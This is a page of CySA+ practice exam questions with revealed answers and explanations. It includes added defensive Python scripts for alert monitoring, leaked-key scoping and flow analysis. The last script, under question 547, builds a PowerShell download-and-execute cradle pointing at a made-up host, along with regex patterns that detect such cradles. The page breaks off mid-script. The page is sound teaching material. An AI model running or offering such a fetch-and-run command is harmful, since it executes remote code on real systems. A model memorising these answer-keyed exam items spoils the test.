CompTIA CySA+ CS0-003 (CS0-003) — Questions 526–600

989 questions total · 14 pages · All types, answers revealed

Page 8 of 14
526
MCQ · easy

A security analyst is reviewing the results of a vulnerability scan. The analyst sees a plugin output that includes the CVSS vector string AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. What is the base score of this vulnerability?

A. 6.5
B. 9.8
C. 10.0
D. 7.5
Answer: B

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H yields a base score of 9.8 in CVSS v3.1.

Why this answer

The vector indicates Network attack vector, Low attack complexity, No privileges required, No user interaction, Unchanged scope, and High impact on Confidentiality, Integrity, and Availability. For CVSS v3.1, this corresponds to a base score of 9.8 (Critical).

527
Multi-Select · hard

A root-cause analysis finds that an alert fired but was never triaged. Which corrective actions are useful? (Choose two.)

Select 2 answers
A. Blame an individual without process review
B. Delete the alert rule because it was inconvenient
C. Define queue ownership and escalation thresholds
D. Add monitoring for stale or unassigned alerts
Answers: C, D

Ownership prevents alerts being orphaned.

Why this answer

Option C is correct because defining queue ownership and escalation thresholds ensures that alerts are assigned to a specific team or individual and have a clear path for escalation if not acknowledged within a defined time. This directly addresses the root cause of the alert never being triaged by enforcing accountability and automated follow-up, which is a standard incident response practice per NIST SP 800-61. Option D is correct because monitoring for stale or unassigned alerts turns the failure mode itself into a signal: an alert that sits unacknowledged past its threshold raises its own escalation instead of silently ageing out of the queue.

Exam trap

The CS0-003 exam often tests the misconception that punitive measures (blaming individuals) or removing inconvenient alerts are valid corrective actions, when the correct approach is always to improve process and automation to prevent recurrence.
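The two correct options work together: ownership and thresholds define what "stale" means, and the monitor enforces it. The script below is an added example of such a monitor (not from any SIEM or ticketing product); the escalation policy, queue owners and the alert-queue export are all constructed for the example.

```python
"""Stale-alert monitor (added example). Flags alerts that nobody has picked up
within the per-severity triage SLA, and alerts sitting in a queue with no owner."""
from datetime import datetime, timezone, timedelta

# Constructed escalation policy: how long an alert may sit untriaged per severity,
# and who owns each queue. In practice this lives in the SOC runbook.
TRIAGE_SLA = {"critical": timedelta(minutes=15), "high": timedelta(hours=1),
              "medium": timedelta(hours=4), "low": timedelta(hours=24)}
QUEUE_OWNER = {"edr": "soc-tier1", "cloud": "cloud-sec", "email": "soc-tier1"}

# Constructed alert-queue export (ISO-8601 timestamps, UTC).
ALERTS = [
    {"id": "A-1001", "queue": "edr", "severity": "critical",
     "created": "2024-05-02T09:00:00Z", "assignee": None, "status": "new"},
    {"id": "A-1002", "queue": "cloud", "severity": "high",
     "created": "2024-05-02T07:30:00Z", "assignee": "alice", "status": "in_progress"},
    {"id": "A-1003", "queue": "email", "severity": "low",
     "created": "2024-05-01T08:00:00Z", "assignee": None, "status": "new"},
    {"id": "A-1004", "queue": "edr", "severity": "medium",
     "created": "2024-05-02T08:00:00Z", "assignee": None, "status": "new"},
    {"id": "A-1005", "queue": "legacy-ids", "severity": "high",
     "created": "2024-05-02T08:50:00Z", "assignee": None, "status": "new"},
]


def _parse(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_stale_alerts(alerts, now_iso: str):
    """Return findings for alerts that breach the triage SLA while unassigned, and for
    alerts whose queue has no owner at all (the root cause named in this question)."""
    now = _parse(now_iso)
    findings = []
    for a in alerts:
        owner = QUEUE_OWNER.get(a["queue"])
        age = now - _parse(a["created"])
        if owner is None:
            # No owner means no SLA can be enforced; escalate to whoever owns the SOC.
            findings.append({"id": a["id"], "reason": "queue has no owner",
                             "escalate_to": "soc-manager"})
            continue
        if a["assignee"] is None and age > TRIAGE_SLA[a["severity"]]:
            findings.append({"id": a["id"], "reason": f"unassigned for {age}",
                             "escalate_to": owner})
    return findings


if __name__ == "__main__":
    for f in find_stale_alerts(ALERTS, "2024-05-02T09:30:00Z"):
        print(f"{f['id']}: {f['reason']} -> escalate to {f['escalate_to']}")
```

Run on a schedule, the output becomes a ticket or a page to the queue owner, so the monitor closes the gap the root-cause analysis found rather than adding another alert that could itself be ignored.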

528
MCQ · medium

A company wants to prioritize vulnerabilities based on exploitability and impact. Which industry standard framework should the analyst use?

A. CVSS v3
B. OWASP Top 10
C. CVE
D. NIST SP 800-53
Answer: A

CVSS provides a numeric severity score based on exploitability and impact.

Why this answer

CVSS v3 (Common Vulnerability Scoring System) is the industry-standard framework for prioritizing vulnerabilities based on exploitability and impact. It provides a numerical score (0-10) derived from metrics such as Attack Vector, Attack Complexity, Privileges Required, User Interaction, and Scope, along with Confidentiality, Integrity, and Availability impact. This allows analysts to objectively rank vulnerabilities for remediation.

Exam trap

CompTIA often tests the distinction between a vulnerability scoring system (CVSS) and a vulnerability identification system (CVE), causing candidates to confuse CVE as a prioritization tool.

How to eliminate wrong answers

Option B (OWASP Top 10) is wrong because it is a list of the most critical web application security risks, not a scoring system for individual vulnerabilities; it does not assign exploitability or impact scores. Option C (CVE) is wrong because it is a dictionary of publicly disclosed vulnerabilities with unique identifiers, not a prioritization or scoring framework. Option D (NIST SP 800-53) is wrong because it is a catalog of security controls for federal information systems, not a vulnerability scoring methodology.

529
Multi-Select · medium

An organization is implementing a new security incident response plan and wants to establish clear communication protocols. Which three of the following are essential components of effective incident communication? (Choose three.)

Select 3 answers
A. Defining a single point of contact (POC) for each stakeholder group
B. Using only email for all incident updates to maintain a written record
C. Establishing pre-approved templates for different incident types
D. Including all employees in every incident notification to ensure transparency
E. Creating an escalation matrix with authority levels for decision-making
F. Automatically releasing incident details to the press within one hour
Answers: A, C, E

Why this answer

Defining a single point of contact (POC) for each stakeholder group ensures clear, controlled communication and prevents conflicting information. Pre-approved templates for different incident types enable rapid, consistent, and accurate notifications without needing to craft messages from scratch during a crisis. An escalation matrix with authority levels ensures that decisions are made by the appropriate personnel based on incident severity, preventing delays and unauthorized actions.

Exam trap

CompTIA often tests the distinction between 'transparency' and 'controlled communication' — candidates may incorrectly choose 'include all employees' thinking it promotes transparency, but the exam expects role-based, need-to-know notifications to avoid operational chaos.

530
MCQ · easy

Two servers have the same critical vulnerability. One hosts a public payment API; the other is a lab server isolated from production. Which factor changes the remediation priority and gives the best risk-based order of work?

A. The number of installed fonts
B. The colour of the scanner dashboard
C. Whether the hostname is shorter
D. Asset criticality, exposure, and business impact
Answer: D

The same CVE can represent different risk depending on where it exists and what the asset supports.

Why this answer

Option D is correct because remediation priority in vulnerability management is determined by asset criticality, exposure, and business impact, not by superficial attributes. The public payment API server has high business impact and exposure to external threats, making it a higher priority than the isolated lab server, even though both share the same vulnerability. This aligns with risk-based prioritization frameworks such as CVSS environmental metrics and FAIR analysis.

Exam trap

The CS0-003 exam often tests the misconception that all vulnerabilities with the same CVSS base score should be remediated with equal urgency, ignoring the critical role of asset context and business impact in risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because the number of installed fonts has no bearing on vulnerability severity, exploitability, or business risk; it is an irrelevant system configuration detail. Option B is wrong because the colour of the scanner dashboard is a cosmetic UI element that does not affect technical risk assessment or prioritization decisions. Option C is wrong because hostname length is arbitrary and does not correlate with asset criticality, exposure, or the likelihood of exploitation; a shorter hostname does not indicate higher risk.

531
MCQ · medium

In a regulated payment environment, a developer accidentally committed a cloud access key to a public repository. Logs show the key was used from an unfamiliar IP. Which action should be taken first to reduce risk without losing evidence?

A. Wait to see whether charges increase
B. Disable or rotate the key and review actions performed with it
C. Block the developer's laptop from Wi-Fi
D. Ask the developer to delete the commit only
Answer: B

The exposed credential must be invalidated and its use scoped through audit logs. This is a containment step: responders need an action that reduces risk while preserving the investigation record.

Why this answer

Option B is correct because the immediate priority is to revoke the compromised cloud access key to prevent further unauthorized use, while simultaneously reviewing logs to understand the scope of the attacker's actions. In a regulated payment environment (e.g., PCI DSS), failing to disable the key promptly could lead to a data breach and non-compliance penalties. Reviewing actions with the key is essential for incident response and forensic evidence collection.

Exam trap

The CS0-003 exam often tests the misconception that containment means physically isolating the user (e.g., blocking Wi-Fi) rather than logically revoking the compromised credential, leading candidates to pick Option C over the correct technical containment action.

How to eliminate wrong answers

Option A is wrong because waiting to see whether charges increase is a passive, reactive approach that allows the attacker continued access, potentially exfiltrating sensitive payment data or escalating privileges; this violates the containment phase of incident response. Option C is wrong because blocking the developer's laptop from Wi-Fi does not revoke the cloud access key; the key remains valid and can still be used from the unfamiliar IP, and isolating the developer may hinder legitimate response work without addressing the root cause. Option D is wrong because deleting the commit does not invalidate the key: the repository has already been cloned and indexed, the key has already been used, and rewriting history may also destroy evidence of what was exposed and when.
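The second half of the correct answer, reviewing what the key did, is where the forensic value lies. The following is an added example of that scoping step over CloudTrail-style records; it is not AWS code. The events are constructed using the real CloudTrail field names (userIdentity.accessKeyId, eventName, sourceIPAddress, errorCode, requestParameters); the key ID is AWS's documentation placeholder, and the IP ranges and bucket names are made up.

```python
"""Scope the use of a leaked access key from a CloudTrail export (added example)."""
import ipaddress
import json
from collections import Counter

LEAKED_KEY = "AKIAIOSFODNN7EXAMPLE"   # AWS's documented placeholder key ID
# Constructed: addresses the organisation recognises as its own egress.
KNOWN_EGRESS = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed CloudTrail-style export (a real one is a JSON object with a "Records" array).
CLOUDTRAIL_EXPORT = json.dumps({"Records": [
    {"eventTime": "2024-05-02T08:10:11Z", "eventName": "GetCallerIdentity", "eventSource": "sts.amazonaws.com",
     "sourceIPAddress": "203.0.113.77", "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE", "userName": "ci-deploy"}},
    {"eventTime": "2024-05-02T08:10:40Z", "eventName": "ListBuckets", "eventSource": "s3.amazonaws.com",
     "sourceIPAddress": "203.0.113.77", "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE", "userName": "ci-deploy"}},
    {"eventTime": "2024-05-02T08:11:02Z", "eventName": "GetObject", "eventSource": "s3.amazonaws.com",
     "sourceIPAddress": "203.0.113.77", "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE", "userName": "ci-deploy"},
     "requestParameters": {"bucketName": "payments-exports", "key": "2024-05/settlements.csv"}},
    {"eventTime": "2024-05-02T08:12:30Z", "eventName": "CreateUser", "eventSource": "iam.amazonaws.com",
     "sourceIPAddress": "203.0.113.77", "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE", "userName": "ci-deploy"},
     "errorCode": "AccessDenied"},
    {"eventTime": "2024-05-02T08:15:00Z", "eventName": "PutObject", "eventSource": "s3.amazonaws.com",
     "sourceIPAddress": "198.51.100.12", "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE", "userName": "ci-deploy"}},
    {"eventTime": "2024-05-02T08:16:00Z", "eventName": "DescribeInstances", "eventSource": "ec2.amazonaws.com",
     "sourceIPAddress": "198.51.100.12", "userIdentity": {"accessKeyId": "AKIA0000000000OTHER0", "userName": "ops"}},
]})

# IAM calls that, if they succeeded, give the attacker a foothold that survives rotating this key.
PERSISTENCE_CALLS = {"CreateUser", "CreateAccessKey", "AttachUserPolicy", "PutUserPolicy",
                     "CreateRole", "UpdateAssumeRolePolicy", "CreateLoginProfile"}


def _from_known_egress(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in KNOWN_EGRESS)


def scope_key_usage(export_json: str, key_id: str) -> dict:
    """Summarise what one access key did, from which unfamiliar IPs, and what to chase next."""
    records = json.loads(export_json)["Records"]
    mine = [r for r in records if r.get("userIdentity", {}).get("accessKeyId") == key_id]
    unknown_ips = sorted({r["sourceIPAddress"] for r in mine if not _from_known_egress(r["sourceIPAddress"])})
    attacker_events = [r for r in mine if r["sourceIPAddress"] in unknown_ips]
    succeeded = [r for r in attacker_events if "errorCode" not in r]
    return {
        "events_with_key": len(mine),
        "unknown_ips": unknown_ips,
        "attacker_calls": Counter(r["eventName"] for r in attacker_events),
        # Objects read or written from the unfamiliar IP: the data-exposure scope for the PCI DSS report.
        "data_touched": sorted(f"{r['requestParameters']['bucketName']}/{r['requestParameters']['key']}"
                               for r in succeeded
                               if r["eventName"] in ("GetObject", "PutObject") and "requestParameters" in r),
        # Failed or successful attempts to create extra identities: eradication must cover these too.
        "persistence_attempts": [(r["eventName"], r.get("errorCode", "Success"))
                                 for r in attacker_events if r["eventName"] in PERSISTENCE_CALLS],
        "first_seen": min(r["eventTime"] for r in attacker_events) if attacker_events else None,
    }


if __name__ == "__main__":
    print(json.dumps(scope_key_usage(CLOUDTRAIL_EXPORT, LEAKED_KEY), indent=2))
```

The disable step itself is a one-liner in the AWS CLI (`aws iam update-access-key --access-key-id ... --status Inactive --user-name ...`), and it should run before or alongside this review, never after it; the review tells you whether the AccessDenied on CreateUser was the only persistence attempt or whether a new user or key now needs removing as well.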

532
Multi-Select · medium

A security analyst is investigating a phishing incident that resulted in credential theft. Which TWO actions should the analyst take as part of short-term containment? (Choose two.)

Select 2 answers
A. Block the phishing domain at the email gateway
B. Rebuild the affected workstations from a clean image
C. Conduct a full vulnerability scan of the network
D. Change all user passwords in the domain
E. Disable the compromised user accounts
Answers: A, E

Correct. This prevents more users from clicking.

Why this answer

Short-term containment aims to stop the immediate threat. Disabling accounts and blocking malicious domains are quick containment actions.

533
Multi-Select · hard

A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)

Select 3 answers
A. Scheduled tasks in the Task Scheduler
B. Windows Event Logs for login events
C. Network connections from the endpoint
D. Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
E. Services listed in the Service Control Manager
Answers: A, D, E

Correct. Scheduled tasks are a common persistence mechanism.

Why this answer

Registry Run keys (T1547.001), scheduled tasks (T1053.005), and services (T1543.003) are common persistence mechanisms. Startup folders are also common but are not listed as a separate option here; the three listed are correct.

534
MCQ · easy

During a phishing investigation, an employee reports clicking a link and entering credentials. Which of the following should be the first step?

A. Conduct user awareness training
B. Block the phishing domain
C. Analyze the email headers
D. Reset the employee's password
Answer: D

Immediate password reset mitigates account compromise.

Why this answer

The immediate priority after credential compromise is to secure the account and prevent unauthorized access. Resetting the employee's password (Option D) invalidates the stolen credentials, stopping the attacker from using them to log in. This is the containment phase of the NIST SP 800-61 incident response lifecycle, which takes priority over analysis and longer-term remediation.

Exam trap

The CS0-003 exam often tests the distinction between containment and remediation; the trap here is that candidates choose 'Analyze the email headers' (Option C) because they confuse forensic analysis with the first step of incident response, but the priority must always be to stop active harm before investigating.

How to eliminate wrong answers

Option A is wrong because user awareness training is a long-term preventive measure, not an immediate containment step; conducting it first would leave the compromised account vulnerable. Option B is wrong because blocking the phishing domain, while useful, does not address the immediate risk of the attacker using the stolen credentials to access the account. Option C is wrong because analyzing email headers is part of the forensic investigation phase, which should follow containment to avoid delaying critical account protection.

535
MCQ · medium

A security team is implementing CIS Benchmarks for a Linux server. They need to choose between Level 1 and Level 2 benchmarks. Which of the following best describes Level 1 benchmarks?

A. They are basic security settings that can be implemented with minimal disruption
B. They are mandatory for compliance with DoD STIGs
C. They are the most restrictive settings, suitable for high-security environments
D. They include advanced settings that require extensive testing
Answer: A

Level 1 is designed to be a practical, easy-to-implement baseline.

Why this answer

CIS Level 1 benchmarks are intended to provide a baseline security configuration without causing significant operational impact.

536
MCQ · hard

A post-incident report finds that no one owned a failed alert integration. What should the corrective action in the report include?

A. A vague recommendation to improve security
B. Deletion of the integration record
C. Named owner, due date, acceptance criteria, and retest plan
D. No action because the incident is closed
Answer: C

Corrective actions should be accountable and verifiable: someone owns them, they have a deadline, and there is a defined test that shows they worked.

Why this answer

Option C is correct because a failed alert integration indicates a gap in accountability and process validation. The corrective action must assign a named owner, set a due date, define acceptance criteria, and include a retest plan to ensure the integration is properly configured and monitored. This aligns with ITIL's change management and incident management practices, where ownership and verification are critical to closing the loop on failed controls.

Exam trap

The CS0-003 exam often tests the misconception that a vague recommendation or deleting a record is sufficient for corrective action, when in fact the exam emphasizes the need for specific, accountable, and verifiable remediation steps in post-incident reporting.

How to eliminate wrong answers

Option A is wrong because a vague recommendation to improve security lacks specificity and does not address the root cause of the failed integration; it provides no actionable steps for remediation or verification. Option B is wrong because deleting the integration record removes evidence of the failure and does not fix the underlying configuration or ownership issue; it also violates audit trail requirements and could mask recurring problems.

537
MCQ · hard

During a web application penetration test using Burp Suite, a security analyst identifies that an API endpoint accepts a URL parameter that is used to fetch data from an external resource. The application does not validate or sanitize the parameter. This is most likely vulnerable to which attack?

A. SQL injection
B. Server-Side Request Forgery (SSRF)
C. Cross-site scripting (XSS)
D. XML External Entity (XXE)
Answer: B

SSRF exploits the server to make unauthorized requests to internal or external resources.

Why this answer

Server-Side Request Forgery (SSRF) occurs when an attacker can induce the server to make requests to arbitrary URLs, often by manipulating a URL parameter.

538
MCQ · medium

A business unit accepts the risk of delaying a patch because downtime would breach a contractual deadline. What should be updated so that the accepted risk is recorded and controlled rather than hidden?

A. The phishing training completion list
B. The risk register with owner, justification, expiry date, and compensating controls
C. The firewall vendor invoice
D. The incident containment playbook only
Answer: B

Risk acceptance must be explicit, time-bound, owned, and controlled.

Why this answer

Option B is correct because when a business unit accepts the risk of delaying a patch, the risk register must be updated to formally document the risk acceptance. This update should include the risk owner, the business justification for the delay, an expiry date for the exception, and any compensating controls (e.g., network segmentation, enhanced monitoring) that reduce the risk during the gap. This ensures the risk is tracked, reviewed, and eventually remediated, aligning with vulnerability management best practices.

Exam trap

The CS0-003 exam often tests the distinction between operational activities (e.g., training, billing) and formal risk management documentation; the trap here is that candidates may confuse updating a training list or invoice with the required risk register update, failing to recognize that risk acceptance must be formally recorded with ownership and compensating controls.

How to eliminate wrong answers

Option A is wrong because phishing training completion lists address user awareness and social engineering risks, not the technical risk of delaying a critical patch; updating this list does not document or manage the accepted risk. Option C is wrong because the firewall vendor invoice is a financial document unrelated to risk acceptance or vulnerability management; it does not capture the risk owner, justification, expiry date, or compensating controls needed for formal risk tracking.

539
MCQ · hard

A cybersecurity analyst is preparing a threat intelligence report for the SOC team. Which type of intelligence should be included to provide actionable indicators of compromise (IoCs)?

A. Tactical intelligence
B. Strategic intelligence
C. Technical intelligence
D. Operational intelligence
Answer: A

Tactical intelligence provides IoCs for immediate action.

Why this answer

Tactical intelligence includes IoCs such as IP addresses, domain names, and hashes that can be used for detection and blocking.

540
MCQ · easy

Which technology is specifically designed to detect anomalous user behavior that may indicate a compromised account?

A. IDS
B. UEBA
C. SIEM
D. Antivirus
Answer: B

UEBA uses machine learning to detect anomalous user and entity behavior.

Why this answer

User and Entity Behavior Analytics (UEBA) is specifically designed to establish baselines of normal user behavior and detect anomalous activities—such as unusual login times, impossible travel, or abnormal data access patterns—that may indicate a compromised account. Unlike signature-based tools, UEBA leverages machine learning and statistical modeling to identify deviations from established norms, making it the correct choice for detecting account compromise.

Exam trap

CompTIA often tests the distinction between correlation-based tools (SIEM) and behavior-based tools (UEBA), and the trap here is that candidates confuse SIEM's log aggregation and rule-based alerting with UEBA's machine learning-driven anomaly detection for user behavior.

How to eliminate wrong answers

Option A is wrong because an Intrusion Detection System (IDS) primarily monitors network traffic for known attack signatures or protocol anomalies, not user behavior patterns. Option C is wrong because a Security Information and Event Management (SIEM) system aggregates and correlates logs from multiple sources but relies on predefined rules and signatures rather than behavioral baselining to detect anomalies. Option D is wrong because Antivirus software detects and blocks known malware based on signatures and heuristics, not user behavior or account compromise indicators.

541
MCQ · medium

An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?

A. tcpdump
B. nmap
C. Wireshark
D. NetFlow analyzer
Answer: D

NetFlow provides aggregated flow records, enabling quick searches for traffic on a specific port.

Why this answer

NetFlow collects metadata about network flows, including destination IP and port, enabling analysts to query for all traffic on a specific port across the network.
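What the NetFlow query actually looks like is the point of this question, so here is an added example of the search (not code from any flow collector). The records are constructed in the CSV shape a flow exporter prints (timestamp, source, destination, ports, protocol, bytes); the C2 address, port and internal hosts are made up. The logic keeps only internal-to-external flows whose destination port matches, groups them by internal host, and notes which hosts reached the exact IP the sandbox reported.

```python
"""Find internal hosts talking to a suspicious port in flow records (added example)."""
import csv
import io
import ipaddress
from collections import defaultdict

C2_PORT = 4444
C2_IP = "203.0.113.45"   # the external IP from the sandbox report (constructed)

# RFC 1918 space counts as "internal" here; adjust to the organisation's own ranges.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed flow export. Row 2 is the return direction, row 5 is port 443 to the
# same C2 IP, rows 4 and 7 are other hosts; these exercise the filtering rules.
FLOWS_CSV = """ts,src,dst,sport,dport,proto,bytes
2024-05-02T10:01:03Z,10.20.5.17,203.0.113.45,51722,4444,TCP,1840
2024-05-02T10:01:04Z,203.0.113.45,10.20.5.17,4444,51722,TCP,912
2024-05-02T10:03:15Z,10.20.5.17,203.0.113.45,51730,4444,TCP,62210
2024-05-02T10:04:00Z,10.20.7.8,198.51.100.9,40112,4444,TCP,120
2024-05-02T10:05:11Z,10.20.9.2,203.0.113.45,43990,443,TCP,3300
2024-05-02T10:06:40Z,10.20.5.17,172.217.16.46,51801,443,TCP,5500
2024-05-02T10:07:02Z,10.20.11.31,203.0.113.45,49155,4444,TCP,700
"""


def _is_internal(addr: str) -> bool:
    a = ipaddress.ip_address(addr)
    return any(a in net for net in INTERNAL)


def hosts_talking_to_port(flows_csv: str, port: int, c2_ip: str = "") -> dict:
    """Group outbound flows with destination port `port` by internal source host.
    Returns {host: {flows, bytes_out, peers, first, last, matches_c2}}."""
    summary = defaultdict(lambda: {"flows": 0, "bytes_out": 0, "peers": set(),
                                   "first": None, "last": None})
    for row in csv.DictReader(io.StringIO(flows_csv)):
        if int(row["dport"]) != port or not _is_internal(row["src"]) or _is_internal(row["dst"]):
            continue   # keep only internal -> external flows to the port of interest
        h = summary[row["src"]]
        h["flows"] += 1
        h["bytes_out"] += int(row["bytes"])
        h["peers"].add(row["dst"])
        h["first"] = row["ts"] if h["first"] is None else min(h["first"], row["ts"])
        h["last"] = row["ts"] if h["last"] is None else max(h["last"], row["ts"])
    return {host: {**h, "peers": sorted(h["peers"]), "matches_c2": c2_ip in h["peers"]}
            for host, h in summary.items()}


if __name__ == "__main__":
    for host, h in sorted(hosts_talking_to_port(FLOWS_CSV, C2_PORT, C2_IP).items()):
        flag = "C2 MATCH" if h["matches_c2"] else "other peer"
        print(f"{host}: {h['flows']} flows, {h['bytes_out']} bytes out, {h['peers']} ({flag})")
```

The byte count matters as much as the match: 10.20.5.17 sent roughly 62 KB on its second connection, which is the kind of volume that turns a "beacon" into a possible exfiltration and changes what the packet-level tools (tcpdump, Wireshark) should be pointed at next.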

542
Multi-Select · medium

A vulnerability report is going to system owners. Which elements make it actionable? (Choose three.)

Select 3 answers
A. Only a generic statement that risk exists
B. Affected assets and owners
C. Due dates based on severity or SLA
D. Remediation guidance and validation steps
Answers: B, C, D

Owners need to know what they must fix.

Why this answer

Option B is correct because identifying affected assets and their owners is essential for accountability and remediation. Without this information, system owners cannot determine which systems require patching or configuration changes, making the report non-actionable. This aligns with the NIST SP 800-40 Rev. 4 guidance on vulnerability management, which emphasizes asset ownership as a prerequisite for response.

Exam trap

The CS0-003 exam often tests the misconception that a vulnerability report is actionable if it merely states risk exists, but without asset ownership and due dates, the report lacks the specificity required for system owners to take concrete steps.

543
MCQ · medium

A user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. During detection and analysis, what should the incident responder do first?

A. Ignore it if MFA is enabled
B. Delete all emails from the mailbox
C. Only reset the user's Windows password
D. Revoke the app grant, review mailbox access, and identify other users who consented
Answer: D

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the incident responder must first revoke the malicious OAuth app grant to immediately stop the attacker's access via the delegated mailbox permissions. Following revocation, reviewing mailbox access logs (e.g., Mailbox Audit Log, EWS/Graph API calls) is essential to assess the scope of compromise, and identifying other users who consented to the same app is critical to contain lateral movement. This aligns with the NIST SP 800-61 incident response lifecycle's containment and eradication phase.

Exam trap

CompTIA often tests the misconception that password resets or MFA can mitigate OAuth consent attacks, when in reality the OAuth grant is independent of the user's authentication credentials and must be explicitly revoked.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants permissions, the app can access the mailbox without any further authentication, bypassing MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not remove the attacker's persistent access via the OAuth grant, which must be revoked first. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token or the delegated permissions; the app retains mailbox access until the grant is explicitly revoked.

544
MCQ · medium

After a high-priority SOC escalation, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. Which first response best matches incident-response practice?

A. Ignore it if MFA is enabled
B. Delete all emails from the mailbox
C. Only reset the user's Windows password
D. Revoke the app grant, review mailbox access, and identify other users who consented
Answer: D

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth consent grant, which removes the app's access to the mailbox via the Microsoft Graph API. Reviewing mailbox access (e.g., via Exchange Online audit logs) is necessary to assess data exfiltration, and identifying other users who consented helps contain a potential phishing campaign targeting the same app. This follows the NIST SP 800-61 incident response process for containment, eradication, and recovery.

Exam trap

CompTIA often tests the misconception that resetting a password or enabling MFA is sufficient to revoke OAuth app access, when in fact OAuth tokens are independent of user credentials and require explicit grant revocation.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants delegated permissions, the app can access the mailbox using its own tokens without requiring MFA. Option B is wrong because deleting all emails destroys forensic evidence and does not remove the app's persistent access; the OAuth grant must be revoked first. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token or the app's granted permissions; the app can continue to access the mailbox via the Microsoft identity platform.

545
Multi-Select · hard

A host is suspected of running fileless malware. Which artefacts should be collected quickly? (Choose two.)

Select 2 answers
A. Memory image or live response data
B. Active network connections and running processes
C. A list of cafeteria purchases
D. A printed office map
Answers: A, B

Fileless activity may exist mainly in memory.

Why this answer

Fileless malware operates in memory without writing to disk, so capturing a memory image or live response data preserves the malicious code, injected DLLs, and process hollowing artifacts that would vanish on reboot. Active network connections and running processes reveal the malware's C2 communications and its in-memory execution context, which are critical for identifying the infection vector and scope.

Exam trap

The CS0-003 exam often tests the misconception that fileless malware leaves no artifacts at all, leading candidates to overlook memory and live response data, or to choose irrelevant options like cafeteria purchases that seem like a distractor but have no forensic value.

546
MCQ · easy

Which of the following vulnerability lifecycle phases involves verifying that a remediation has been successfully applied and that the vulnerability no longer exists?

A. Discovery
B. Prioritization
C. Remediation
D. Verification
Answer: D

Correct; verification confirms the fix was effective.

Why this answer

Verification is the phase where after remediation, the system is rescanned or checked to confirm the vulnerability is mitigated.

547
MCQ · medium

A security operations center (SOC) analyst is investigating an alert from the endpoint detection and response (EDR) system indicating that a process named "svchost.exe" spawned from a parent process "cmd.exe" on a user workstation. The user is a software developer who frequently uses command-line tools. The analyst checks the command line arguments: "cmd.exe /c powershell -EncodedCommand ...". The encoded command decodes to a script that downloads a payload from a remote server and executes it. The analyst also sees that the workstation has established an outbound connection to the same server on port 443. Which of the following is the BEST immediate action?

A. Isolate the workstation from the network.
B. Disable the user account.
C. Kill the svchost.exe process.
D. Block the remote server IP at the firewall.
Answer: A

Immediately contains the threat by preventing further communication and lateral movement.

Why this answer

Isolating the workstation is the best immediate action because the EDR alert confirms active compromise: a malicious encoded PowerShell command executed via cmd.exe spawned svchost.exe (a process commonly abused for masquerading), and an outbound connection to the same C2 server on port 443 (HTTPS) indicates ongoing data exfiltration or further payload delivery. Network isolation stops all communication with the attacker while preserving forensic evidence on the endpoint, which is critical for containment in a SOC response.

Exam trap

CompTIA often tests the misconception that blocking the remote IP or killing the process is sufficient, but the trap here is that the active outbound connection and running payload require immediate network containment to prevent data exfiltration and lateral movement, not just reactive blocking or process termination.

How to eliminate wrong answers

Option B is wrong because disabling the user account does not stop the already-running malicious process or its outbound C2 connection; the threat persists on the endpoint regardless of authentication status. Option C is wrong because killing svchost.exe may disrupt the malware but does not block the outbound connection already established, and the process could be a legitimate svchost.exe instance that has been injected or hollowed, making termination risky without analysis. Option D is wrong because blocking the remote server IP at the firewall only prevents future connections from that IP but does not stop the current active session or the malware already executing on the workstation, and the attacker can easily switch to a different IP or domain.
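The scenario hinges on the analyst having decoded the -EncodedCommand argument. That step is mechanical but easy to get wrong (the payload is base64 of UTF-16LE, not UTF-8), so here is an added example of the decode-and-triage routine, not EDR-vendor code. The command line is constructed: the block builds the encoded form from a sample download cradle so it runs offline, and the host and path in the sample are made up.

```python
"""Decode a PowerShell -EncodedCommand argument and score it (added example)."""
import base64
import re

# PowerShell's rule: -EncodedCommand is base64 of the script encoded as UTF-16LE.
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString("
                 "'http://203.0.113.9/stage.ps1')")
# Constructed process command line in the shape the EDR alert in this question shows.
SAMPLE_CMDLINE = ("cmd.exe /c powershell -NoP -W Hidden -EncodedCommand "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())

# Indicators a triager looks for once the script is readable.
DOWNLOAD_CRADLES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient",
    re.IGNORECASE)
EXECUTION = re.compile(r"\bIEX\b|Invoke-Expression|Start-Process|\[Reflection\.Assembly\]",
                       re.IGNORECASE)
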